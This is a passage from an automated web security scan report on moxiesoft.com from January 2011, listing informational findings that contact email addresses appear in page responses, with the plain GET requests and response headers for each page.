<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.150. http://www.moxiesoft.com/tal_news/webinars_recorded.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_news/webinars_recorded.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.151. http://www.moxiesoft.com/tal_products/answer.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/answer.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.152. http://www.moxiesoft.com/tal_products/chat.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/chat.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

Response

21.153. http://www.moxiesoft.com/tal_products/chat_benefits.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/chat_benefits.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_products/chat_benefits.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.154. http://www.moxiesoft.com/tal_products/chat_tour.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/chat_tour.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_products/chat_tour.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.155. http://www.moxiesoft.com/tal_products/chat_tour2.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/chat_tour2.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_products/chat_tour2.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.156. http://www.moxiesoft.com/tal_products/clicktocall.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/clicktocall.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_products/clicktocall.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.157. http://www.moxiesoft.com/tal_products/cobrowse.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/cobrowse.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.158. http://www.moxiesoft.com/tal_products/collaboration.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/collaboration.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_products/collaboration.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.159. http://www.moxiesoft.com/tal_products/customer-spaces.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/customer-spaces.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.160. http://www.moxiesoft.com/tal_products/email.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/email.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

Response

21.161. http://www.moxiesoft.com/tal_products/employee-spaces.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/employee-spaces.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

Response

21.162. http://www.moxiesoft.com/tal_products/knowledgebase.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/knowledgebase.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

Response

21.163. http://www.moxiesoft.com/tal_products/phone.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/phone.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.164. http://www.moxiesoft.com/tal_products/proactive_chat.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/proactive_chat.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.165. http://www.moxiesoft.com/tal_products/proactivechatdemo/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/proactivechatdemo/

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_products/proactivechatdemo/ HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.166. http://www.moxiesoft.com/tal_products/products.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/products.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_products/products.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

21.167. http://www.moxiesoft.com/tal_products/request_demo.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/request_demo.aspx

Issue detail

The following email addresses were disclosed in the response:

cimleads@ngenera.com
info@moxiesoft.com
noreply@ngenera.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<input type="hidden" name="send_to" value="cimleads@ngenera.com">
...[SNIP]...
<input type="hidden" name="autorespond_from" value="noreply@ngenera.com">
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.168. http://www.moxiesoft.com/tal_products/request_quote.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/request_quote.aspx

Issue detail

The following email addresses were disclosed in the response:

cimleads@ngenera.com
info@moxiesoft.com
noreply@ngenera.com

Request

GET /tal_products/request_quote.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<input type="hidden" name="send_to" value="cimleads@ngenera.com" />
...[SNIP]...
<input type="hidden" name="autorespond_from" value="noreply@ngenera.com" />
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.169. http://www.moxiesoft.com/tal_products/social-media.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/social-media.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_products/social-media.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.170. http://www.moxiesoft.com/tal_resources/content.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_resources/content.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_resources/content.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.171. http://www.moxiesoft.com/tal_resources/resource_center.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_resources/resource_center.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_resources/resource_center.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 61613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.172. http://www.moxiesoft.com/tal_services/advisory-services.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_services/advisory-services.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_services/advisory-services.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:03:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.173. http://www.moxiesoft.com/tal_services/hosting.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_services/hosting.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_services/hosting.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:03:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.174. http://www.moxiesoft.com/tal_services/implementation.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_services/implementation.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_services/implementation.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
